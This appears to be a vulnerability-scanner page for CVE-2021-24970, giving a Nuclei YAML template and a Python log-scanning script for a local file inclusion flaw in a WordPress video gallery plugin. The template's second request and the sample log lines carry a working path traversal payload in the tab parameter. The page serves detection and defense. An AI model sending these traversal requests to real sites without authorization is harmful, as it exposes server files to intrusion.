WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion
ID: CVE-2021-24970
Severity: high
Author: r3Y3r53
Tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360
Description
WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
YAML Source
```yaml
id: CVE-2021-24970

info:
  name: WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion
  author: r3Y3r53
  severity: high
  description: |
    WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: Fixed in version 2.5.4.
  reference:
    - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10
    - https://wordpress.org/plugins/all-in-one-video-gallery
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24970
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24970
    cwe-id: CWE-22
    epss-score: 0.0297
    epss-percentile: 0.90861
    cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plugins360
    product: all-in-one_video_gallery
    framework: wordpress
  tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "All-in-One Video Gallery")'
          - 'contains(body_2, "Hello world!")'
          - 'contains(body_2, "Welcome to WordPress")'
        condition: and
# digest: 4b0a0048304602210097f3e4789bf7d1992a864d5b14f653b882359283a970ebba3b345022ce39296e022100e927c56e81214ebf159a057970215d03822e8e8ca96eedabe149002669cca87a:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24970.yaml"
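For the detection side, the following added example (not part of the template or of the Nuclei project) scans web server access logs for requests to the plugin's admin page whose tab parameter is anything other than a plain slug, including percent-encoded and double-encoded traversal. The log format, the sample lines, and the rule that legitimate tab values are simple slugs are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (documentation IPs), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=general HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2022:10:00:09 +0000] "GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1" 200 48211
203.0.113.9 - - [10/Jan/2022:10:02:30 +0000] "GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=%252e%252e%255csettings HTTP/1.1" 200 901
198.51.100.4 - - [10/Jan/2022:10:03:00 +0000] "GET /wp-admin/admin.php?page=other-plugin&tab=../x HTTP/1.1" 200 77
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PLUGIN_PAGE = "all-in-one-video-gallery"
# Assumption: legitimate tab names are simple slugs; anything else is flagged.
SAFE_TAB_RE = re.compile(r"[A-Za-z0-9_-]*")

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded separators are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_tab(line):
    """Return the decoded tab value when it is not a plain slug, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    query = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    if not url.path.endswith("/wp-admin/admin.php") or PLUGIN_PAGE not in query.get("page", []):
        return None
    for raw in query.get("tab", []):
        tab = fully_decode(raw)
        if not SAFE_TAB_RE.fullmatch(tab):
            return tab
    return None

def scan(log_text):
    """Return (client_ip, decoded_tab) for every flagged line."""
    pairs = ((l.split()[0], suspicious_tab(l)) for l in log_text.splitlines() if l.strip())
    return [(ip, tab) for ip, tab in pairs if tab is not None]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Because the request requires an authenticated session, correlating flagged lines with the preceding /wp-login.php POST from the same client helps identify which account was used.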